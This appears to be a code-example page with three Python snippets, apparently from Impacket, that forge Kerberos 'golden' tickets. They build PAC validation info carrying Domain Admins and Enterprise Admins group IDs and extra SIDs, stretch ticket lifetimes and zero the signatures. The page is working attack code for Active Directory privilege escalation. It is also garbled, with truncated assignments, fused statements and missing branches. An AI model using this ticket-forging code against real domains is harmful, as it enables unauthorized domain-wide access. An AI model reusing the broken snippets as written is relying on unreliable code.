Beispiel #1
    def createBasicValidationInfo(self):
        kerbdata = KERB_VALIDATION_INFO()

        aTime = timegm(datetime.datetime.utcnow().timetuple())
        unixTime = self.getFileTime(aTime)

        kerbdata['LogonTime']['dwLowDateTime'] = unixTime & 0xffffffff
        kerbdata['LogonTime']['dwHighDateTime'] = unixTime >> 32

        # LogoffTime: A FILETIME structure that contains the time the client's logon
        # session should expire. If the session should not expire, this structure
        # SHOULD have the dwHighDateTime member set to 0x7FFFFFFF and the dwLowDateTime
        # member set to 0xFFFFFFFF. A recipient of the PAC SHOULD<7> use this value as
        # an indicator of when to warn the user that the allowed time is due to expire.
        kerbdata['LogoffTime']['dwLowDateTime'] = 0xFFFFFFFF
        kerbdata['LogoffTime']['dwHighDateTime'] = 0x7FFFFFFF

        # KickOffTime: A FILETIME structure that contains LogoffTime minus the user
        # account's forceLogoff attribute ([MS-ADA1] section 2.233) value. If the
        # client should not be logged off, this structure SHOULD have the dwHighDateTime
        # member set to 0x7FFFFFFF and the dwLowDateTime member set to 0xFFFFFFFF.
        # The Kerberos service ticket end time is a replacement for KickOffTime.
        # The service ticket lifetime SHOULD NOT be set longer than the KickOffTime of
        # an account. A recipient of the PAC SHOULD<8> use this value as the indicator
        # of when the client should be forcibly disconnected.
        kerbdata['KickOffTime']['dwLowDateTime'] = 0xFFFFFFFF
        kerbdata['KickOffTime']['dwHighDateTime'] = 0x7FFFFFFF

        kerbdata['PasswordLastSet']['dwLowDateTime'] = unixTime & 0xffffffff
        kerbdata['PasswordLastSet']['dwHighDateTime'] = unixTime >> 32

        kerbdata['PasswordCanChange']['dwLowDateTime'] = 0
        kerbdata['PasswordCanChange']['dwHighDateTime'] = 0

        # PasswordMustChange: A FILETIME structure that contains the time at which
        # theclient's password expires. If the password will not expire, this
        # structure MUST have the dwHighDateTime member set to 0x7FFFFFFF and the
        # dwLowDateTime member set to 0xFFFFFFFF.
        kerbdata['PasswordMustChange']['dwLowDateTime'] = 0xFFFFFFFF
        kerbdata['PasswordMustChange']['dwHighDateTime'] = 0x7FFFFFFF

        kerbdata['EffectiveName'] = self.__target
        kerbdata['FullName'] = ''
        kerbdata['LogonScript'] = ''
        kerbdata['ProfilePath'] = ''
        kerbdata['HomeDirectory'] = ''
        kerbdata['HomeDirectoryDrive'] = ''
        kerbdata['LogonCount'] = 500
        kerbdata['BadPasswordCount'] = 0
        kerbdata['UserId'] = int(self.__options.user_id)
        kerbdata['PrimaryGroupId'] = 513

        # Our Golden Well-known groups! :)
        groups = self.__options.groups.split(',')
        kerbdata['GroupCount'] = len(groups)

        for group in groups:
            groupMembership = GROUP_MEMBERSHIP()
            groupId = NDRULONG()
            groupId['Data'] = int(group)
            groupMembership['RelativeId'] = groupId
            groupMembership['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED

        kerbdata['UserFlags'] = 0
        kerbdata['UserSessionKey'] = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
        kerbdata['LogonServer'] = ''
        kerbdata['LogonDomainName'] = self.__domain.upper()
        kerbdata['LMKey'] = b'\x00\x00\x00\x00\x00\x00\x00\x00'
        kerbdata['UserAccountControl'] = USER_NORMAL_ACCOUNT | USER_DONT_EXPIRE_PASSWORD
        kerbdata['SubAuthStatus'] = 0
        kerbdata['LastSuccessfulILogon']['dwLowDateTime'] = 0
        kerbdata['LastSuccessfulILogon']['dwHighDateTime'] = 0
        kerbdata['LastFailedILogon']['dwLowDateTime'] = 0
        kerbdata['LastFailedILogon']['dwHighDateTime'] = 0
        kerbdata['FailedILogonCount'] = 0
        kerbdata['Reserved3'] = 0

        kerbdata['ResourceGroupDomainSid'] = NULL
        kerbdata['ResourceGroupCount'] = 0
        kerbdata['ResourceGroupIds'] = NULL

        validationInfo = VALIDATION_INFO()
        validationInfo['Data'] = kerbdata

        return validationInfo
Beispiel #2
    def getGoldenPAC(self, authTime):
        # Ok.. we need to build a PAC_TYPE with the following items

        aTime = timegm(strptime(str(authTime), '%Y%m%d%H%M%SZ'))

        unixTime = getFileTime(aTime)

        kerbdata = KERB_VALIDATION_INFO()

        kerbdata['LogonTime']['dwLowDateTime'] = unixTime & 0xffffffff
        kerbdata['LogonTime']['dwHighDateTime'] = unixTime >> 32

        # LogoffTime: A FILETIME structure that contains the time the client's logon
        # session should expire. If the session should not expire, this structure
        # SHOULD have the dwHighDateTime member set to 0x7FFFFFFF and the dwLowDateTime
        # member set to 0xFFFFFFFF. A recipient of the PAC SHOULD<7> use this value as
        # an indicator of when to warn the user that the allowed time is due to expire.
        kerbdata['LogoffTime']['dwLowDateTime'] = 0xFFFFFFFF
        kerbdata['LogoffTime']['dwHighDateTime'] = 0x7FFFFFFF

        # KickOffTime: A FILETIME structure that contains LogoffTime minus the user
        # account's forceLogoff attribute ([MS-ADA1] section 2.233) value. If the
        # client should not be logged off, this structure SHOULD have the dwHighDateTime
        # member set to 0x7FFFFFFF and the dwLowDateTime member set to 0xFFFFFFFF.
        # The Kerberos service ticket end time is a replacement for KickOffTime.
        # The service ticket lifetime SHOULD NOT be set longer than the KickOffTime of
        # an account. A recipient of the PAC SHOULD<8> use this value as the indicator
        # of when the client should be forcibly disconnected.
        kerbdata['KickOffTime']['dwLowDateTime'] = 0xFFFFFFFF
        kerbdata['KickOffTime']['dwHighDateTime'] = 0x7FFFFFFF

        kerbdata['PasswordLastSet']['dwLowDateTime'] = 0
        kerbdata['PasswordLastSet']['dwHighDateTime'] = 0

        kerbdata['PasswordCanChange']['dwLowDateTime'] = 0
        kerbdata['PasswordCanChange']['dwHighDateTime'] = 0

        # PasswordMustChange: A FILETIME structure that contains the time at which
        # theclient's password expires. If the password will not expire, this
        # structure MUST have the dwHighDateTime member set to 0x7FFFFFFF and the
        # dwLowDateTime member set to 0xFFFFFFFF.
        kerbdata['PasswordMustChange']['dwLowDateTime'] = 0xFFFFFFFF
        kerbdata['PasswordMustChange']['dwHighDateTime'] = 0x7FFFFFFF

        kerbdata['EffectiveName'] = self.__username
        kerbdata['FullName'] = ''
        kerbdata['LogonScript'] = ''
        kerbdata['ProfilePath'] = ''
        kerbdata['HomeDirectory'] = ''
        kerbdata['HomeDirectoryDrive'] = ''
        kerbdata['LogonCount'] = 0
        kerbdata['BadPasswordCount'] = 0
        kerbdata['UserId'] = self.__rid
        kerbdata['PrimaryGroupId'] = 513

        # Our Golden Well-known groups! :)
        groups = (513, 512, 520, 518, 519)
        kerbdata['GroupCount'] = len(groups)

        for group in groups:
            groupMembership = GROUP_MEMBERSHIP()
            groupId = NDRULONG()
            groupId['Data'] = group
            groupMembership['RelativeId'] = groupId

        kerbdata['UserFlags'] = 0
            'UserSessionKey'] = '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
        kerbdata['LogonServer'] = ''
        kerbdata['LogonDomainName'] = self.__domain
        kerbdata['LogonDomainId'] = self.__domainSid
        kerbdata['LMKey'] = '\x00\x00\x00\x00\x00\x00\x00\x00'
        kerbdata['SubAuthStatus'] = 0
        kerbdata['LastSuccessfulILogon']['dwLowDateTime'] = 0
        kerbdata['LastSuccessfulILogon']['dwHighDateTime'] = 0
        kerbdata['LastFailedILogon']['dwLowDateTime'] = 0
        kerbdata['LastFailedILogon']['dwHighDateTime'] = 0
        kerbdata['FailedILogonCount'] = 0
        kerbdata['Reserved3'] = 0

        # AUTHENTICATION_AUTHORITY_ASSERTED_IDENTITY: A SID that means the client's identity is
        # asserted by an authentication authority based on proof of possession of client credentials.
        #extraSids = ('S-1-18-1',)
        extraSids = ()
        kerbdata['SidCount'] = len(extraSids)

        for extraSid in extraSids:
            sidRecord = KERB_SID_AND_ATTRIBUTES()
            sid = RPC_SID()
            sidRecord['Sid'] = sid

        kerbdata['ResourceGroupDomainSid'] = NULL
        kerbdata['ResourceGroupCount'] = 0
        kerbdata['ResourceGroupIds'] = NULL

        validationInfo = self.VALIDATION_INFO()
        validationInfo['Data'] = kerbdata

        validationInfoBlob = validationInfo.getData(
        ) + validationInfo.getDataReferents()
        validationInfoAlignment = '\x00' * ((
            (len(validationInfoBlob) + 7) / 8 * 8) - len(validationInfoBlob))

        # 2) PAC_CLIENT_INFO
        pacClientInfo = PAC_CLIENT_INFO()
        pacClientInfo['ClientId'] = unixTime
        pacClientInfo['NameLength'] = len(self.__username.encode('utf-16le'))
        pacClientInfo['Name'] = self.__username.encode('utf-16le')
        pacClientInfoBlob = str(pacClientInfo)
        pacClientInfoAlignment = '\x00' * ((
            (len(pacClientInfoBlob) + 7) / 8 * 8) - len(pacClientInfoBlob))

        serverChecksum = PAC_SIGNATURE_DATA()

        # If you wanna do CRC32, uncomment this
        #serverChecksum['SignatureType'] = self.CRC_32
        #serverChecksum['Signature'] = '\x00'*4

        # If you wanna do MD4, uncomment this
        #serverChecksum['SignatureType'] = self.RSA_MD4
        #serverChecksum['Signature'] = '\x00'*16

        # If you wanna do MD5, uncomment this
        serverChecksum['SignatureType'] = self.RSA_MD5
        serverChecksum['Signature'] = '\x00' * 16

        serverChecksumBlob = str(serverChecksum)
        serverChecksumAlignment = '\x00' * ((
            (len(serverChecksumBlob) + 7) / 8 * 8) - len(serverChecksumBlob))

        privSvrChecksum = PAC_SIGNATURE_DATA()

        # If you wanna do CRC32, uncomment this
        #privSvrChecksum['SignatureType'] = self.CRC_32
        #privSvrChecksum['Signature'] = '\x00'*4

        # If you wanna do MD4, uncomment this
        #privSvrChecksum['SignatureType'] = self.RSA_MD4
        #privSvrChecksum['Signature'] = '\x00'*16

        # If you wanna do MD5, uncomment this
        privSvrChecksum['SignatureType'] = self.RSA_MD5
        privSvrChecksum['Signature'] = '\x00' * 16

        privSvrChecksumBlob = str(privSvrChecksum)
        privSvrChecksumAlignment = '\x00' * ((
            (len(privSvrChecksumBlob) + 7) / 8 * 8) - len(privSvrChecksumBlob))

        # The offset are set from the beginning of the PAC_TYPE
        # [MS-PAC] 2.4 PAC_INFO_BUFFER
        offsetData = 8 + len(str(PAC_INFO_BUFFER())) * 4

        # Let's build the PAC_INFO_BUFFER for each one of the elements
        validationInfoIB = PAC_INFO_BUFFER()
        validationInfoIB['ulType'] = PAC_LOGON_INFO
        validationInfoIB['cbBufferSize'] = len(validationInfoBlob)
        validationInfoIB['Offset'] = offsetData
        offsetData = (offsetData + validationInfoIB['cbBufferSize'] +
                      7) / 8 * 8

        pacClientInfoIB = PAC_INFO_BUFFER()
        pacClientInfoIB['ulType'] = PAC_CLIENT_INFO_TYPE
        pacClientInfoIB['cbBufferSize'] = len(pacClientInfoBlob)
        pacClientInfoIB['Offset'] = offsetData
        offsetData = (offsetData + pacClientInfoIB['cbBufferSize'] + 7) / 8 * 8

        serverChecksumIB = PAC_INFO_BUFFER()
        serverChecksumIB['ulType'] = PAC_SERVER_CHECKSUM
        serverChecksumIB['cbBufferSize'] = len(serverChecksumBlob)
        serverChecksumIB['Offset'] = offsetData
        offsetData = (offsetData + serverChecksumIB['cbBufferSize'] +
                      7) / 8 * 8

        privSvrChecksumIB = PAC_INFO_BUFFER()
        privSvrChecksumIB['ulType'] = PAC_PRIVSVR_CHECKSUM
        privSvrChecksumIB['cbBufferSize'] = len(privSvrChecksumBlob)
        privSvrChecksumIB['Offset'] = offsetData
        offsetData = (offsetData + privSvrChecksumIB['cbBufferSize'] +
                      7) / 8 * 8

        # Building the PAC_TYPE as specified in [MS-PAC]
        buffers = str(validationInfoIB) + str(pacClientInfoIB) + str(
            serverChecksumIB) + str(
            ) + validationInfoBlob + validationInfoAlignment + str(
                pacClientInfo) + pacClientInfoAlignment
        buffersTail = str(serverChecksum) + serverChecksumAlignment + str(
            privSvrChecksum) + privSvrChecksumAlignment

        pacType = PACTYPE()
        pacType['cBuffers'] = 4
        pacType['Version'] = 0
        pacType['Buffers'] = buffers + buffersTail

        blobToChecksum = str(pacType)

        # If you want to do CRC-32, ucomment this
        #serverChecksum['Signature'] = struct.pack('<L', (binascii.crc32(blobToChecksum, 0xffffffff) ^ 0xffffffff) & 0xffffffff)
        #privSvrChecksum['Signature'] =  struct.pack('<L', (binascii.crc32(serverChecksum['Signature'], 0xffffffff) ^ 0xffffffff) & 0xffffffff)

        # If you want to do MD4, ucomment this
        #serverChecksum['Signature'] =
        #privSvrChecksum['Signature'] =['Signature']).digest()

        # If you want to do MD5, ucomment this
        serverChecksum['Signature'] =
        privSvrChecksum['Signature'] =

        buffersTail = str(serverChecksum) + serverChecksumAlignment + str(
            privSvrChecksum) + privSvrChecksumAlignment
        pacType['Buffers'] = buffers + buffersTail

        authorizationData = AuthorizationData()
        authorizationData[0] = None
        authorizationData[0]['ad-type'] = int(
        authorizationData[0]['ad-data'] = str(pacType)
        return encoder.encode(authorizationData)
Beispiel #3
    def customizeTicket(self, kdcRep, pacInfos):'Customizing ticket for %s/%s' % (self.__domain, self.__target))
        encTicketPart = EncTicketPart()

        flags = list()
        if self.__domain == self.__server: 
        encTicketPart['flags'] = encodeFlags(flags)
        encTicketPart['key'] = noValue
        encTicketPart['key']['keytype'] = kdcRep['ticket']['enc-part']['etype']

        if encTicketPart['key']['keytype'] == EncryptionTypes.aes128_cts_hmac_sha1_96.value:
            encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)])
        elif encTicketPart['key']['keytype'] == EncryptionTypes.aes256_cts_hmac_sha1_96.value:
            encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(32)])
            encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)])

        encTicketPart['crealm'] = self.__domain.upper()
        encTicketPart['cname'] = noValue
        encTicketPart['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
        encTicketPart['cname']['name-string'] = noValue
        encTicketPart['cname']['name-string'][0] = self.__target

        encTicketPart['transited'] = noValue
        encTicketPart['transited']['tr-type'] = 0
        encTicketPart['transited']['contents'] = ''

        encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
        encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
        # Let's extend the ticket's validity a lil bit
        ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(days=int(self.__options.duration))
        encTicketPart['endtime'] = KerberosTime.to_asn1(ticketDuration)
        encTicketPart['renew-till'] = KerberosTime.to_asn1(ticketDuration)
        encTicketPart['authorization-data'] = noValue
        encTicketPart['authorization-data'][0] = noValue
        encTicketPart['authorization-data'][0]['ad-type'] = AuthorizationDataType.AD_IF_RELEVANT.value
        encTicketPart['authorization-data'][0]['ad-data'] = noValue

        # Let's locate the KERB_VALIDATION_INFO and Checksums
        if PAC_LOGON_INFO in pacInfos:
            data = pacInfos[PAC_LOGON_INFO]
            validationInfo = VALIDATION_INFO()
            lenVal = len(validationInfo.getData())
            validationInfo.fromStringReferents(data[lenVal:], lenVal)

            aTime = timegm(strptime(str(encTicketPart['authtime']), '%Y%m%d%H%M%SZ'))

            unixTime = self.getFileTime(aTime)

            kerbdata = KERB_VALIDATION_INFO()

            kerbdata['LogonTime']['dwLowDateTime'] = unixTime & 0xffffffff
            kerbdata['LogonTime']['dwHighDateTime'] = unixTime >> 32

            # Let's adjust username and other data
            validationInfo['Data']['LogonDomainName'] = self.__domain.upper()
            validationInfo['Data']['EffectiveName'] = self.__target
            # Our Golden Well-known groups! :)
            groups = self.__options.groups.split(',')
            validationInfo['Data']['GroupIds'] = list()
            validationInfo['Data']['GroupCount'] = len(groups)

            for group in groups:
                groupMembership = GROUP_MEMBERSHIP()
                groupId = NDRULONG()
                groupId['Data'] = int(group)
                groupMembership['RelativeId'] = groupId
                groupMembership['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED

            # Let's add the extraSid
            if self.__options.extra_sid is not None:
                extrasids = self.__options.extra_sid.split(',')
                if validationInfo['Data']['SidCount'] == 0:
                    # Let's be sure user's flag specify we have extra sids.
                    validationInfo['Data']['UserFlags'] |= 0x20
                    validationInfo['Data']['ExtraSids'] = PKERB_SID_AND_ATTRIBUTES_ARRAY()
                for extrasid in extrasids:
                    validationInfo['Data']['SidCount'] += 1

                    sidRecord = KERB_SID_AND_ATTRIBUTES()

                    sid = RPC_SID()

                    sidRecord['Sid'] = sid
                    sidRecord['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED

                    # And, let's append the magicSid
                validationInfo['Data']['ExtraSids'] = NULL

            validationInfoBlob  = validationInfo.getData() + validationInfo.getDataReferents()
            pacInfos[PAC_LOGON_INFO] = validationInfoBlob

            if logging.getLogger().level == logging.DEBUG:
                logging.debug('VALIDATION_INFO after making it gold')
                print ('\n')
            raise Exception('PAC_LOGON_INFO not found! Aborting')'\tPAC_LOGON_INFO')

        # Let's now clear the checksums
        if PAC_SERVER_CHECKSUM in pacInfos:
            serverChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_SERVER_CHECKSUM])
            if serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value:
                serverChecksum['Signature'] = '\x00' * 12
            elif serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value:
                serverChecksum['Signature'] = '\x00' * 12
                serverChecksum['Signature'] = '\x00' * 16
            pacInfos[PAC_SERVER_CHECKSUM] = serverChecksum.getData()
            raise Exception('PAC_SERVER_CHECKSUM not found! Aborting')

        if PAC_PRIVSVR_CHECKSUM in pacInfos:
            privSvrChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_PRIVSVR_CHECKSUM])
            privSvrChecksum['Signature'] = '\x00' * 12
            if privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value:
                privSvrChecksum['Signature'] = '\x00' * 12
            elif privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value:
                privSvrChecksum['Signature'] = '\x00' * 12
                privSvrChecksum['Signature'] = '\x00' * 16
            pacInfos[PAC_PRIVSVR_CHECKSUM] = privSvrChecksum.getData()
            raise Exception('PAC_PRIVSVR_CHECKSUM not found! Aborting')

        if PAC_CLIENT_INFO_TYPE in pacInfos:
            pacClientInfo = PAC_CLIENT_INFO(pacInfos[PAC_CLIENT_INFO_TYPE])
            pacClientInfo['ClientId'] = unixTime
            pacInfos[PAC_CLIENT_INFO_TYPE] = pacClientInfo.getData()
            raise Exception('PAC_CLIENT_INFO_TYPE not found! Aborting')'\tPAC_CLIENT_INFO_TYPE')'\tEncTicketPart')

        if self.__domain == self.__server:
            encRepPart = EncASRepPart()
            encRepPart = EncTGSRepPart()

        encRepPart['key'] = noValue
        encRepPart['key']['keytype'] = encTicketPart['key']['keytype']
        encRepPart['key']['keyvalue'] = encTicketPart['key']['keyvalue']
        encRepPart['last-req'] = noValue
        encRepPart['last-req'][0] = noValue
        encRepPart['last-req'][0]['lr-type'] = 0
        encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
        encRepPart['nonce'] = 123456789
        encRepPart['key-expiration'] = KerberosTime.to_asn1(ticketDuration)
        encRepPart['flags'] = encodeFlags(flags)
        encRepPart['authtime'] = str(encTicketPart['authtime'])
        encRepPart['endtime'] = str(encTicketPart['endtime'])
        encRepPart['starttime'] = str(encTicketPart['starttime'])
        encRepPart['renew-till'] = str(encTicketPart['renew-till'])
        encRepPart['srealm'] = self.__domain.upper()
        encRepPart['sname'] = noValue
        encRepPart['sname']['name-string'] = noValue
        encRepPart['sname']['name-string'][0] = self.__service

        if self.__domain == self.__server:
            encRepPart['sname']['name-type'] = PrincipalNameType.NT_SRV_INST.value
            encRepPart['sname']['name-string'][1] = self.__domain.upper()
            encRepPart['sname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
            encRepPart['sname']['name-string'][1] = self.__server

        return encRepPart, encTicketPart, pacInfos